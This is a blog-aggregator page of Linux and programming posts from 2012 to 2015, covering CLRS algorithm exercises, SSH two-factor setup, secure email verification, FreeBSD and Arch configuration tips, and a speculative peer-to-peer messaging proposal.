Planet LILUG

December 31, 2015

Nate Berry

Ian Murdock, founder of Debian, dead at 42 under strange circumstances

Mr. Murdock, the founder of Debian, had apparently suddenly begun posting some very strange things on Twitter over the weekend suggesting that he was planning suicide but also alleging police abuse. The posts seemed uncharacteristic of him, and many folks speculated that his account had been hacked.

by Nate at December 31, 2015 06:21 PM

November 10, 2015

Nate Berry

OpenELEC runs great on the Raspberry Pi2

I’ve had a Raspberry Pi2 since earlier this year when it first came out. I had gotten it in a package which included a see-through plastic case, a miniSD card pre-loaded with Noobs on it, a wifi USB dongle, USB power supply, and HDMI cable. Since I already had a wireless keyboard and mouse I […]

by Nate at November 10, 2015 02:05 AM

July 26, 2015

Eitan Adler

Pre-Interview NDAs Are Bad

I get quite a few emails from business folk asking me to interview with them or forward their request to other coders I know. Given the volume it isn't feasible to respond affirmatively to all these requests.

If you want to get a coder's attention there are a lot of things you could do, but there is one thing you shouldn't do: require them to sign an NDA before you interview them.

From the candidates point of view:

  1. There are a lot more ideas than qualified candidates.
  2. Its unlikely your idea is original. It doesn't mean anyone else is working on it, just that someone else probably thought of it.
  3. Lets say the candidate was working on a similar, if not identical project. If the candidate fails to continue with you now they have to consult a lawyer to make sure you can't sue them for a project they were working on before
  4. NDAs are hard legal documents and shouldn't be signed without consulting a lawyer. Does the candidate really want to find a lawyer before interviewing with you?
  5. An NDA puts the entire obligation on the candidate. What does the candidate get from you?
From a company founders point of view:
  1. Everyone talks about the companies they interview with to someone. Do you want to be that strange company which made them sign an NDA? It can harm your reputation easily.
  2. NDAs do not stop leaks. They serve to create liability when a leak occurs. Do you want to be the company that sues people that interview with them?

There are some exceptions; for example government and security jobs may require security clearance and an NDA. For mose jobs it is possible to determine if a coder is qualified and a good fit without disclosing confidential company secrets.

by Eitan Adler ( at July 26, 2015 08:13 PM

June 16, 2015

Eitan Adler

Blogging My Way Through CLRS Section 4.1

After another long break of not writing up any CLRS answers here is section 4.1.
Question 4.1-1:

What does $\textit{Find-Maximum-Subarray}$ return when all elements of $A$ are negative?

The procedure would return the single element of maximum value. This is expected since the maximum subarray must contain at least one element. This can be computed by note that $\textit{Find-Max-Crossing-Subarray}$ will always return the array of solely the midpoint and that $\textit{Find-Maximum-Subarray}$ always finds the maxium of $\{leftsum, rightsum, and crosssum\}$

Question 4.1-2:

Write pseudocode for the brute-force method of solving the max-subarray problem. Your solution should run in $\theta(n^2)$ time.

max_i = nil
max_j = nil
max_sum = -∞

for i in 0..len(A):
   cur_sum = 0
   for j in i..len(A):
     cur_sum += A[j]
     if cur_sum > max_sum:
       max_sum = cur_sum
       max_i = i
       max_j = j
return (max_i, max_j, max_sum)

Question 4.1-3:

Implement both the brute-force and recursive algorithms for the maximum-subarray problem on your own computer. What problem size $n_0$ gives the crossover point at which the recursive algorithm beats the brute-force algorithm? Then, change the base case of the recursive algorithm to use the brute-force algorithm whenever the problem size is less than $n_0$. Does that change the crossover point?

This question asks a question that is specific to the implementation, and the computer on which it is run. I will therefore be skipping it in this writeup. It is worthwhile to note that it is almost guarenteed that changing he implementation to use the brute force method for values less than $n_0$ is very likely to change $n_0$.

Question 4.1-4:

Suppose we change the definition of the maximum-subarray problem to allow the result to be an empty subarray, where the sum of the values of an empty subarray is 0. How would you change any of the algorithms that do not allow empty subarrays to permit an empty subarray to be the result?

For the brute force algorithm it would be rather trivial to add a check, and if the return max_sum is > 0 return the empty array.

For the recursive divide and conquer algorithm is is sufficient to just change the $\textit{Find-Max-Crossing-Subarray}$ in a manner similar to the brute force method. If $\textit{Find-Max-Crossing-Subarray}$ return the correct value, then $\textit{Find-Maximum-Subarray}$ will do the correct thing.

Question 4.1-5:

Develop a nonrecursive linear-time algorithm for the maximum-subarray problem.[1]

If one knows a previous answer to the max-subarray problem for a given prefix of the array than any new element consists of only two cases: being part of the maximum subarray or not being part of the maximum subarray. It is easier to explain with pseudocode: max_start = 0
max_end = 0
max_sum = A[0]

max_with_j = A[0]
for j in 1..len(A):
  # If J is in a maximum-subarray, either j is going to being the maximum on its, or it will will add to the current max  max_with_j = max(A[j], max_with_j + x)
  Determine if J is in a maximum-subarray
  if max_with_j >= max_sum:
    max_sum = max_with_j
    max_end = j
    #Set the starting value if j is the sole element of a new subarray
    if max_with_j == A[j]:
      max_start = j
return (max_start, max_end, cur_max)

  1. The question provides some hints as to the solution of the problem.

by Eitan Adler ( at June 16, 2015 02:06 AM

May 08, 2015

Nate Berry

Still using Arch on my Thinkpad T410s, but not with KDE anymore

Its been a while since I’ve posted anything here so just as an excercise for the fingers I thought I’d post an update about my current machine. I’ve been running Arch on an old Thinkpad T410s for almost a year now ( journalctl says logs started on June 23, 2014). Its an Intel i5 M560 […]

by Nate at May 08, 2015 01:47 AM

March 30, 2015

Eitan Adler

FreeBSD SMB Client under OSX Host

I recently purchased a new Macbook Pro and wanted to get a FreeBSD Virtual Machine set up in order to continue doing development work on it. Unfortunately, FreeBSD as a guest does not support native folder sharing so I decided to try using a samba mounted.

I decided to set up my VM to have two network interfaces: a NATed interface for internet access and a host-only interface for access to SMB and ssh.

The NAT networking configuration looks like:

NetworkName: FreeBSDNatNetwork
IPv6 Enabled: Yes
IPv6 Prefix:
DHCP Enabled: Yes
Enabled: Yes
Port-forwarding (ipv4)
SSH IPv4:tcp:[]:5022:[]:22
Port-forwarding (ipv6)
FreeBSD ssh:tcp:[]:6022:[fd17:625c:f037:2:a00:27ff:fefc:9dab]:22
loopback mappings (ipv4)

The Host-Only networking configuration looks like:

Name: vboxnet0
GUID: 786f6276-656e-4074-8000-0a0027000000
DHCP: Disabled
IPV6NetworkMaskPrefixLength: 0
HardwareAddress: 0a:00:27:00:00:00
MediumType: Ethernet
Status: Up
VBoxNetworkName: HostInterfaceNetworking-vboxnet0
The FreeBSD configuration looks like this: The OSX sharing configuration looks like:

Unfortunately, when attempting to actually mount the SMB filesystem with: mount_smbfs -I //eax@ I get the error mount_smbfs: can't get server address: syserr = Operation timed out

I tried installing the package net/samba36 and found that I needed the --signing=off flag to let it work:

It seems based on this setup and research that FreeBSD can not natively mount an OSX samba share. It might be possible to use sysutils/fusefs-smbnetfs. Other people have recommended NFS or sshfs.

by Eitan Adler ( at March 30, 2015 03:12 AM

January 26, 2015

Nate Berry

Printing to Canon MX860 wirelessly from Arch Linux

I’ve been using Arch more often than the Ubuntu machine lately and since I know that my Canon printer is not well supported under Linux I was putting off trying to get it going under Arch. In Ubuntu I was able to use some .deb packages that were hosted on a European Canon website to […]

by Nate at January 26, 2015 03:56 AM

January 19, 2015

Nate Berry

Crontab reference

This is just a snippet of text I got from here which I keep around and paste into my crontab on any new machine I set up. If I forget to do this I invariably end up googling it again… every time. # CRONTAB REF # from # # * * * * * […]

by Nate at January 19, 2015 01:39 PM

November 15, 2014

Nate Berry

Using i3 on my Arch USB flash drive

Back in February I wrote about setting up a bootable USB stick with Arch Linux. At the time I was using it with a Dell laptop, but since then have been running it mainly off an old Thinkpad T410s (with a now totally non-functional power cable and a cracked palmrest) that had been retired from […]

by Nate at November 15, 2014 07:08 PM

September 03, 2014

Eitan Adler

Finding the majority element in a stream of numbers

Some time ago I came across the following question.
As input a finite stream stream of numbers is provided. Define an algorithm to find the majority element of the input. The algorithm need not provide a sensible result if no majority element exists. You may assume a transdichotomous memory model.
There are a few definitions which may not be immediately clear:
A possibly infinite set of data which may not be reused in either the forward or backward direction without explicitly storing it.
Majority element
An element in a set which occurs more than half the time.
The integer size is equal to the word size of memory. One does not need to worry about storing partial pieces of integers in separate memory units.
Unfortunately this answer isn't of my own invention, but it is interesting and succinct.

The algorithm (click to view)Using 3 registers the accumulator, the guess and the current element (next):
  1. Initialize accumulator to 0
  2. Accept the next element of the stream and place it into next. If there are no more elements go to step #7.
  3. If accumulator is 0 place next into guess and increment accumulator.
  4. Else if guess matches next increment accumulator
  5. Else decrement accumulator
  6. Go to step 2
  7. Return the value in guess as the result

An interesting property of this algorithm is that it can be implemented in $O(n)$ time even on a single tape Turing Machine.

by Eitan Adler ( at September 03, 2014 12:56 AM

May 24, 2014

Nate Berry

Upgrading the Macbook to Ubuntu 14.04

While I certainly have been enjoying running Arch on usb on the Dell, my main machine is still the old MacBook running Ubuntu. I had some extra time today and thought “hey, I should install steam and grab FTL and Kerbal Space Program” but then promptly decided Id rather do upgrades? Im running Gnome3 not […]

by Nate at May 24, 2014 05:56 PM

February 16, 2014

Nate Berry

Arch Linux on bootable, persistent USB drive

I recently got a new laptop from work. Its a refurbished Dell Latitude E6330 with an Intel Core i5 processor, a 13″ screen and a 120GB SSD drive that came with Windows 7 Pro. I haven’t used Windows regularly in quite some time (I’ve been using a WinXP VM on the rare occassion I need […]

by Nate at February 16, 2014 08:07 PM

November 26, 2013

Nate Berry

Increase disk size of Ubuntu guest running in VMware

A while ago I created a virtual machine (VM) under VMware 5.1 with Ubuntu as the guest OS. I wasn’t giving the task my full attention and I made a couple choices without thinking when setting this one up. The problem I ended up with is that I only allocated about 10GB to the VM […]

by Nate at November 26, 2013 03:25 AM

November 04, 2013

Eitan Adler

Two Factor Authentication for SSH (with Google Authenticator)

Two factor authentication is a method of ensuring that a user has a physical device in addition to their password when logging in to some service. This works by using a time (or counter) based code which is generated by the device and checked by the host machine. Google provides a service which allows one to use their phone as the physical device using a simple app.

This service can be easily configured and greatly increases the security of your host.

Installing Dependencies

  1. There is only one: the Google-Authenticator software itself:
    # pkg install pam_google_authenticator
  2. On older FreeBSD intallations you may use:
    # pkg_add -r pam_google_authenticator
    On Debian derived systems use:
    # apt-get install libpam-google-authenticator

User configuration

Each user must run "google-authenticator" once prior to being able to login with ssh. This will be followed by a series of yes/no prompts which are fairly self-explanatory. Note that the alternate to time-based is to use a counter. It is easy to lose track of which number you are at so most people prefer time-based.
  1. $ google-authenticator
    Do you want authentication tokens to be time-based (y/n)
    Make sure to save the URL or secret key generated here as it will be required later.

Host Configuration

To enable use of Authenticator the host must be set up to use PAM which must be configured to prompt for Authenticator.
  1. Edit the file /etc/pam.d/sshd and add the following in the "auth" section prior to pam_unix:
    auth requisite
  2. Edit /etc/ssh/sshd_config and uncomment
    ChallengeResponseAuthentication yes

Reload ssh config

  1. Finally, the ssh server needs to reload its configuration:
    # service sshd reload

Configure the device

  1. Follow the instructions provided by Google to install the authentication app and setup the phone.

That is it. Try logging into your machine from a remote machine now

Thanks bcallah for proof-reading this post.

by Eitan Adler ( at November 04, 2013 12:56 AM

October 05, 2013


Debian GNU / Linux on Samsung ATIV Book 9 Plus

Samsung just recently released a new piece of kit, ATIV Book 9 plus. Its their top of the line Ultrabook. Being in on the market for a new laptop, when I heard of the specs, I was hooked. Sure it doesn't have the best CPU in a laptop or even amazing amount of ram, in that regard its kind of run of the mill. But that was enough for me. The really amazing thing is the screen, with 3200x1800 resolution and 275DPI. If you were to get a stand alone monitor with similar resolution you'd be forking over anywhere from 50-200% the value of the ATIV Book 9 Plus. Anyway this is not a marketing pitch. As a GNU / Linux user, buying bleeding edge hardware can be a bit intimidating. The problem is that it's not clear if the hardware will work without too much fuss. I couldn't find any reports or folks running GNU / Linux on it, but decided to order one anyway.

My distro of choice is Debian GNU / Linux. So when the machine arrived the first thing I did was, try Debian Live. It did get some tinkering of BIOS (press f2 on boot to enter config) to get it to boot. Mostly because the BIOS UI is horrendus. In the end disabling secure boot was pretty much all it took. Out of the box, most things worked, exception being Wi-Fi and brightness control. At this point I was more or less convinced that getting GNU / Linux running on it would not be too hard.

I proceeded to installing Debian from stable net-boot cd. At first with UEFI enabled but secure boot disabled, installation went over fine but when it came time to boot the machine, it would simply not work. Looked like boot loader wasn't starting properly. I didn't care too much about UEFI so I disabled it completely and re-installed Debian. This time things worked and Debian Stable booted up. I tweaked /etc/apt/sources.list switching from Stable to Testing. Rebooted the machine and noticed that on boot the screen went black. It was rather obvious that the problem was with KMS. Likely the root of the problem was the new kernel (linux-image-3.10-3-amd64) which got pulled in during upgrade to testing. The short term work around is simple, disable KMS (add nomodeset to kernel boot line in grub).

So now I had a booting base system but there was still the problem of Wi-Fi and KMS. I installed latest firmware-iwlwifi which had the required firmware for Intel Corporation Wireless 7260. However Wi-Fi still did not work, fortunately I came across this post on arch linux wiki which states that the Wi-Fi card is only supported in Linux Kernel >=3.11.

After an hour or so of tinkering with kernel configs I got the latest kernel (3.11.3) to boot with working KMS and Wi-Fi. Long story short, until Debian moves to kernel >3.11 you'll need to compile your own or install my custom compiled package. With the latest kernel pretty much everything works this machine. Including the things that are often tricky, like; suspend, backlight control, touchscreen, and obviously Wi-Fi. The only thing remaining thing to figure out, are the volume and keyboard backlight control keys. But for now I'm making due with a software sound mixer. And keyboard backlight can be adjusted with (values: 0-4):

echo "4" > /sys/class/leds/samsung\:\:kbd_backlight/brightness

So if you are looking to get Samsung ATIV Book 9 and wondering if it'll play nice with GNU / Linux. The answer is yes.

by dotCOMmie at October 05, 2013 08:11 PM

August 03, 2013

John Lutz

a theorical p2p dynamic messaging and/or voting system which is open sourced for the people.

  The standard model of internet activity is client/server. One server to each client. Another paradigm which is much less often used is Peer to Peer (p2p).

  Peer to Peer allows each client on the internet to serve and well as receive as a client. This allows for a self-administration and self corrective design. But what is most useful and trusted is that control is decentralized. This is good for many reasons; for both uptime and power abuse is *greatly* diminished.

  Some common examples of p2p in action is Bitcoin, Tor and Bittorrent. With the exception of Tor all of these p2p systems are Open Source. Open Source provides the user with the optional ability to self compile and is critical is mediated control to every user involved. It also allows those black boxes called 'Apps', 'Programs','Systems' or 'Applications' the ability for peer review so that nothing suspicious happens without you knowing. (for example bluetooth and web cames automatically set to record and run as the default behaviour.) [I have band aids covering all my personal laptop cameras.]

  There are many services with systems provided with Apple and most notable Windows that prevent us from knowing what traffic becomes transmitted from out personal technological devices. Open Source allows us to not only conserve our personal information but also to extend and share what we've done with those we see fit. Open Source is equated here with Power to The People. And services such as support, administration or development can also use the monetary model. It all depends on each individual situation. The possibilities of Open Source and indeed amazing.

  There are many forms of Open Source software, but none so wordwide known as an operating system called Linux. There are even, in itself many forms of people and group modified Linux. I have with mixed success have used and administrated Debian, Ubuntu, Red Hat, CentOS and SuSE. Depending on any of these or many many other publically downloadable variations it can take as little as 25 minutes or 3 days to successfully fully install and configure these softwares and typical internet apps. You can literally change the source code (if you had a little swagger) to make them change their default behaviour.

  A p2p system in which a bulletin board system (ala a variation of a standard non-p2p model phpBB or vBulletin) delivered messages with time stamps and backups to other nodes could theorically be created along the lines of how famous p2p systems like Bitcoin operate. Except in the case of this theoretical framework instead of virtual currency it would be messages, votes, blogs. Any kind of data. This framework would be a nonstop behemoth using potentially hundreds of thousands or even millions of clients, who in themselves, also acts as servers. Being free from a centralized control system in which the system changes according to the whims of the few are a vital success in producing, like all good policies, a check and balance system free from tyranny.

 I would suggest if ISPS started to ban protocol ports (for example port XXXX where X=1 to 65526) like bitttorrent , a programmer could creatively reprogram this new theoretical p2p message system to alternate between different ports dynamically. That way each very powerful ISP could not ban the people's p2p messaging system as they have, which in my case, was bittorrent.

 I hope you have fully understood what I have written here. If you have any more questions or would like any more indepth to what I've presented here please let me know on @john_t_lutz on twitter. Or here in this blog. Thank you.

Worldy Yours,
John Lutz

by JohnnyL ( at August 03, 2013 07:22 PM

February 13, 2013

Eitan Adler

Don't Use Timing Functions for Profiling

One common technique for profiling programs is to use the gettimeofday system call (with code that looks something like this):

Example (incorrect) code that uses gettimeofday - click to view
#include <time.h>
#include <stdlib.h>
#include <stdio.h>
void function(void)
struct timeval before;
struct timeval after;
gettimeofday(&before, NULL);
gettimeofday(&after, NULL);
time_t delta = after.tv_sec - before.tv_sec;

However, using gettimeofday(2) or time(3) or any function designed to get a time of day to obtain profiling information is wrong for many reasons:

  1. Time can go backwards. In a virtualized environment this can happen quite often. In non-virtualized environments this can happen due to time zones. Even passing CLOCK_MONOTONIC to clock(3) doesn't help as it can go backwards during a leap second expansion.
  2. Time can change drastically for no reason. Systems with NTP enabled periodically sync their time with a time source. This can cause the system time to change by minutes, hours, or even days!
  3. These functions measure Wall Clock time. Time spent on entirely unrelated processes is going to be included in the profiling data!
  4. Even if you have disabled everything else on the system[1] the delta computed above includes both of User time and System Time. If your algorithm is very fast but the kernel has a slow implementation of some system call you won't learn much.
  5. gettimeofday relies on the cpu clock which may differ across cores resulting in time skew.

So what should be used instead?

There isn't a good, portable, function to obtain profiling information. However there are options for those not tied to a particular system (or those willing to maintain multiple implementations for different systems.

The getrusage(2) system call is one option for profiling data. This provides different fields for user time (ru_utime) and system time (ru_stime) at a relatively high level of precision and accuracy.

Using DTraces profiling provider also seems to be a decent choice although I limited experience with it.

Finally, using APIs meant to access hardware specific features such as FreeBSD's hwpmc is likely to provide the best results at the cost of being the least portable. Linux has similar features such as oprofile and perf. Using dedicated profilers such as Intel's vtunes[2] may also be worthwhile.

  1. Including networking, background process swapping, cron, etc.
  2. A FreeBSD version is available.
update 2012-11-26: Include note about clock skew across cores.
Update 2013-02-13: Update and fix a massive error I had w.r.t. clock(3)

by Eitan Adler ( at February 13, 2013 12:26 AM

January 20, 2013

Nate Berry

Installing Cyanogenmod on ASUS Transformer TF101

editor’s note: I’ve updated this story many times since I first posted it. For the current status, scroll all the way to the end of the story as I’ve appended update notices to the end each time I upgraded or switched Roms. Back in December, 2011 when I first got my ASUS Transformer TF101 it […]

by Nate at January 20, 2013 07:10 PM

January 11, 2013

Nate Berry

Youtube TV control from my android tablet

update 131202: I would disregard most of this post since I’ve picked up a chromecast which, at $35 has made queueing up Youtube, Netflix, or HBOgo videos to the TV stupid easy from the android tablet. I replaced the underpowered atom box with an Intel NUC for more serious gaming (minecraft mainly). ====================== Ive got […]

by Nate at January 11, 2013 02:48 AM

January 04, 2013

Eitan Adler

Correctly Verifying an Email Address

Some services that accept email addresses want to ensure that these email addresses are valid.

There are multiple aspects to an email being valid:
  1. The address is syntactically valid.
  2. An SMTP server accepts mail for the address.
  3. A human being reads mail at the address.
  4. The address belongs to the person submitting it.

How does one verify an email address? I'll start with the wrong solutions and build up the correct one.

Possibility #0 - The Regular Expression

Discussions on a correct regular expression to parse email addresses are endless. They are almost always wrong. Even really basic pattern matching such as *@*.* is wrong: it will reject the valid email address n@ai.[5]

Even a fully correct regular expression does not tell you if the mailbox is valid or reachable.

This scores 0/4 on the validity checking scale.

Possibility #1 - The VRFY Command

The oldest mechanism for verifying an email address is the VRFY mechanism in RFC821 section 4.1.1:

VERIFY (VRFY) This command asks the receiver to confirm that the argument identifies a user. If it is a user name, the full name of the user (if known) and the fully specified mailbox are returned.

However this isn't sufficient. Most SMTP servers disable this feature for security and anti-spam reasons. This feature could be used to enumerate every username on the server to perform more targeted password guessing attacks:

Both SMTP VRFY and EXPN provide means for a potential spammer to test whether the addresses on his list are valid (VRFY)... Therefore, the MTA SHOULD control who is is allowed to issue these commands. This may be "on/off" or it may use access lists similar to those mentioned previously.

This feature wasn't guaranteed to be useful at the time the RFC was written:[1]

The VRFY and EXPN commands are not included in the minimum implementation (Section 4.5.1), and are not required to work across relays when they are implemented.

Finally, even if VRFY was fully implemented there is no guarantee that a human being reads the mail sent to that particular mailbox.

All of this makes VRFY useless as a validity checking mechanism so it scores 1/4 on the validity checking scale.

Possibility #2 - Sending a Probe Message

With this method you try to connect with a mail server and pretends to send a real mail message but cut off before sending the message content. This is wrong for a for the following reasons:

A system administrator that disabled VRFY has a policy of not allowing for the testing for email addresses. Therefore the ability to test the email address by sending a probe should be considered a bug and must not be used.

The system might be set up to detect signs up of a probe such as cutting off early may rate limit or block the sender.

In addition, the SMTP may be temporarily down or the mailbox temporarily unavailable but this method provides no resilience against failure. This is especially true if this mechanism is attempting to provide real-time feedback to the user after submitting a form.

This scores 1/4 on the validity checking scale.

Possibility #3 - Sending a Confirmation Mail

If one cares about if a human is reading the mailbox the simplest way to do so is send a confirmation mail. In the email include a link to a website (or set a special reply address) with some indication of what is being confirmed. For example, to confirm "" is valid the link might be or[2].

This method is resilient against temporary failures and forwarders. Temporary failures could be retried like a normal SMTP conversation.

This way it is unlikely that a non-human will trigger the verification email[3]. This approach solves some of the concerns, it suffers from a fatal flaw:

It isn't secure. It is usually trivial to guess the ID number, email account, other identifier. An attacker could sign up with someone else's email account and then go to the verification page for that user's account. It might be tempting to use a random ID but randomness implementations are usually not secure.

This scores 3/4 on the validity checking scale

Possibility #4 - Sending a Confirmation Mail + HMAC

The correct solution is to send a confirmation, but include a MAC of the identifier in the verification mechanism (reply, or url) as well. A MAC is a construction used to authenticate a message by combining a secret key and the message contents. One family of constructions, HMAC, is a particularly good choice. This way the url might become[4]

Remember that the HMAC is a specific construction, not a naive hash. It would be wise to use a framework native function such as PHP's hash_hmac. Failing to include a secret into the construction would make the MAC trivially defeated by brute force.

This scores 4/4 on the validity checking scale

Closing Notes

Getting email validation right is doable, but not as trivial as many of the existing solutions make it seem.

  1. Note that RFC1123 more specifically spells out that VRFY MUST be implemented but MAY be disabled.

  • This is not my luggage password.
  • It is still possible for a auto-reply bot to trigger reply based verification schemes. Bots that click every link in received email are uncommon.
  • This is HMAC-MD5. It isn't insecure as collisions aren't important for HMAC. I chose it because it is short.
  • n@ai is a in-use email address by a person named Ian:
    %dig +short ai MX
  • Thank you to bd for proofreading and reviewing this blog post.

    by Eitan Adler ( at January 04, 2013 11:40 AM

    December 24, 2012

    Eitan Adler

    #!/bin/bash considered harmful

    When one writes a shell script there are a variety of shebang lines that could be used:

    • #!/bin/sh
    • #!/usr/bin/env bash
    • #!/bin/bash

    or one of many other options.

    Of these only the first two are possibly correct.

    Using #!/bin/bash is wrong because:

    • Sometimes bash isn't installed.
    • If it is installed, it may not be in /bin
    • If it is in /bin, the user may have decided to set PATH to use a different installation of bash. Using an absolute path like this overrides the user's choices.
    • bash shouldn't be used for scripts intended for portability

    If you have bash specific code use #!/usr/bin/env bash. If you want more portable code try using Debian's checkbashism to find instances of non-POSIX compliant shell scripting.

    by Eitan Adler ( at December 24, 2012 06:17 PM

    December 21, 2012

    Eitan Adler

    Cormen on Algorithms: Blogging my way through [1/?]

    Two of my good friends recently started reading Introduction to Algorithms by Thomas H. Cormen, et. al. Being unable to resist peer pressure I decided to follow and read along.

    I plan on blogging my way through the chapters writing my answers to the questions as I go through the book. Like most of my plans they don't always work out, but one could try.

    Here it goes!

    1.1-1: Give a real-world example in which each of the following computational problems appears: (a)Sorting, (b) Determining the best order for multiplying matrices, (c) finding the convex hull of a set of points.
    Sorting - Sorting comes up in virtually every algorithm one could think of. Everything from optimizing monetary investments to efficient compression algorithms has to sort data at some point or another. A harder question might be: Name one non-trivial algorithm that doesn't require sorting.
    Multiplying Matrices - graphics and scientific problems frequently require matrix operations.
    Convex Hull - Collision detection for use in games, modeling biological systems, or other related work could make use of this
    1.1-2: Other than speed what other measures of efficiency might one use in a real-world setting?
    It is possible to optimize for (and against) every limited resource. For example minimizing the amount of memory usage is important for embedded applications (and desktop ones too). Reducing total disk I/O is important to increase the longevity of hard drives. On a less technical note optimizing for monetary cost or man hours expended is important too.
    1.1-3: Select a data structure you have seen previously and discuss its strengths and limitations
    One of the most interesting data structures I know is the Bloom Filter. It is a probabilistic data structure that can determine if an element is NOT in a set but can't determine definitively if an element is in a set. It works by hashing each element in a set to a fixed size bit array. It then ORs the hash with itself (which starts at all zeros). One can test to see if an element is in a set by generating the hash and testing to see if every bit set to 1 in the queried element is set to 1 in the filter. If it is then you have some degree of confidence that the element is in the set. Any negative means that what you are querying for has not been added.
    While most probabilistic structures have certain properties in common, bloom filters have a number of interesting pros and cons.
    1. A negative result is definitive - if a query returns that an element has not been added then one knows this to be 100% true.
    2. Since hashes are fixed size the amount of memory a Bloom Filter uses is known and bounded.
    3. Bloom filters can quickly become useless with large amounts of data. It is possible that every bit will be set to 1 which effectively makes the query a NOP.
    4. It is impossible to remove data from a bloom filter. One can't just set all the bits of the hash to a zero because that might be removing other elements as well.
    5. Without a second set of data there is no way to deterministically list all elements (unlike other probabilistic data structures such as Skip Lists).
    1.1-4: How are the shortest path and traveling salesmen problems similar? How are they different?
    The shortest path problem is
    Given a weighted (undirected) graph G:, a start vertex $V_0$ and an end vertex $V_e$, find a path between $V_0$ and $V_e$ such that the sum of the weights is minimized. This could be expanded to $Given a weighted graph G:, find a path between every pair such that the sum of the weights for each path is minimized.
    Traveling salesman is defined as:
    Given a weighted, undirected, graph G: and a start vertex $V_0$ find a path starting and ending at $V_0$ such that it passes through every other vertex exactly once and the sum of the weights is minimized.
    The traveling salesman problem might make use of the shortest path problem repeatedly in order to come up with the correct solution.
    1.1-5: Come up with a real-world problem in which only the best solution will do. Then come up with a problem in which a solution that is "approximately" the best will do?
    There are very few problems where one needs the objectively optimal solution. Mathematical questions are the only problems I could think of that need that level of accuracy. Virtually every problem needs a good enough solution. Some examples include finding a fast route for packets on the internet or locating a piece of data in a database.
    update 2011-06-30: modified text of answers 1.1-3 and 1.1-5 to be more clear.

    by Eitan Adler ( at December 21, 2012 09:14 AM

    November 22, 2012

    Nate Berry

    Warcraft III on Ubuntu 12.04

    Installing Ubuntu on the MacBook recently, I knew there would be a bunch of OSX programs I would no longer be able to run but I was pretty confident that I’d be able to get some Windows programs going with wine. Having had good luck with Temple of Elemental Evil on the Elitebook last December, […]

    by Nate at November 22, 2012 01:51 AM

    October 31, 2012

    Eitan Adler

    Finding the min and max in 1.5n comparisons

    A friend of mine recently gave me the following problem:

    Given an unsorted set of numbers find the minimum and maximum of set in a maximum of $1.5n$ comparisons.

    My answer involves splitting the list up pairwise and finding the result on the only half of the set.

    1. Go through list and compare every even index to its immediate right (odd) index. Sort each pair numerically within itself. This step takes $\dfrac{1}{2}n$ comparisons.
    2. Find the minimum of every odd index and find the maximum of every even element using the typical algorithm. This step takes $n$ comparisons.

    Note that this could be done in one pass by doing the pair comparison and the min/max comparison in one pass.

    Is there a better way?

    by Eitan Adler ( at October 31, 2012 12:44 PM

    Blogging my way through CLRS Section 11.1 (edition 2)

    I've taken a brief break from blogging about my Cormen readings but I decided to write up the answers to chapter 11. Note that the chapters and question numbers may not match up because I'm using an older edition of the book.
    Question 11.1-1:

    Suppose that a dynamic set $S$ is represented by a direct address table $T$ of length $m$. Describe a procedure that finds the maximum element of $S$. What is the worst case performance of your procedure?

    Assuming the addresses are sorted by key: Start at the end of the direct address table and scan downward until a non-empty slot is found. This is the maximum and if not:

    1. Initialize $max$ to $-\infty$
    2. Start at the first address in the table and scan downward until a used slot is found. If you reach the end goto #5
    3. Compare key to $max$. If it is greater assign it to $max$
    4. Goto #2
    5. Return $max$

    The performance of this algorithm is $\Theta(m)$. A slightly smaller bound can be found in the first case of $\Theta(m - max)$

    Question 11.1-2:

    Describe how to use a bit vector to represent a dynamic set of distinct elements with no satellite data. Dictionary operations should run in $O(1)$ time.

    Initialize a bit vector of length $|U|$ to all $0$s. When storing key $k$ set the $k$th bit and when deleting the $k$th bit set it to zero. This is $O(1)$ even in a non-transdichotomous model though it may be slower.

    Question 11.1-3:

    Suggest how to implement a direct address table in which the keys of stored elements do not need to be distinct and the elements can have satellite data. All three dictionary operations must take $O(1)$ time.

    Each element in the table should be a pointer to the head of a linked list containing the satellite data. $nul$ can be used for non-existent items.

    Question 11.1-4:

    We wish to implement a dictionary by using direct addressing on a large array. At the start the array entries may contain garbage, and initializing the entire array is impractical because of its size. Describe a scheme for implementing a direct address dictionary on the array. Dictionary operations should take $O(1)$ time. Using an additional stack with size proportional to the number of stored keys is permitted.

    On insert the array address is inserted into a stack. The array element is then initialized to the value of the location in the stack.

    On search the array element value is to see if it is pointing into the stack. If it is the value of the stack is checked to see if it is pointing back to the array.[1]

    On delete, the array element can be set to a value not pointing the stack but this isn't required. If the element points to the value of the stack, it is simply popped off. If it is pointing to the middle of the stack, the top element and the key element are swapped and then the pop is performed. In addition the value which the top element was pointing to must be modified to point to the new location

    Question 11.2-1:

    Suppose we have use a hash function $h$ to hash $n$ distinct keys into an array $T$ of length $m$. Assuming simple uniform hashing what is the expected number of collisions?

    Since each new value is equally likely to hash to any slot we would expect $n/m$ collisions.

    Question 11.2-2:

    Demonstrate the insertion of the keys: $5, 28, 19, 15, 20, 33, 12, 17, 10$ into a hash table with 9 slots and $h(k) = k \mod{9}$[2]

    128 -> 19 -> 1
    615 -> 33

    Question 11.2-3:

    If the keys were stored in sorted order how is the running time for successful searches, unsuccessful searches, insertions, and deletions affected under the assumption of simple uniform hashing?

    Successful and unsuccessful searches are largely unaffected although small gains can be achieved if if the search bails out early once the search finds a key later in the sort order than the one being searched for.

    Insertions are the most affected operation. The time is changed from $\Theta(1)$ to $O(n/m)$

    Deletions are unaffected. If the list was doubly linked the time remains $O(1)$. If it was singly linked the time remains $O(1 + \alpha)$

    Question 11.2-4:

    Suggest how storage for elements can be allocated and deallocated within the ash table by linking all unused slots into a free list. Assume one slot can store a flag and either one element or two pointers. All dictionary operations should run in $O(1)$ expected time.

    Initialize all the values to a singly linked free list (flag set to false) with a head and tail pointer. On insert, use the memory pointed to by the head pointer and set the flag to true for the new element and increment the head pointer by one. On delete, set the flag to false and insert the newly freed memory at the tail of the linked list.

    Question 11.2-5:

    Show that if $|U| > nm$ with $m$ the number of slots, there is a subset of $U$ of size $n$ consisting of keys that all hash to the same slot, so that the worst case searching time for hashing with chaining is $\Theta(n)$

    Assuming the worst case of $|U|$ keys in the hash tabe assuming the optimial case of simple uniform hashing all m slots will have $|U|/m = n$ items. Removing the assumption of uniform hashing will allow some chains to become shorter at the expense of other chains becoming longer. There are more items then the number of slots so at least one slot must have at least $n$ items by the pigeon hole principle.

    Question 11.3-1:

    Suppose we wish to search a linked list of length $n$, where every element contains a key $k$ along with a hash value $h(k)$. Each key is a long character string. How might we take advantage of the hash values when searching the list for an element of a given key?

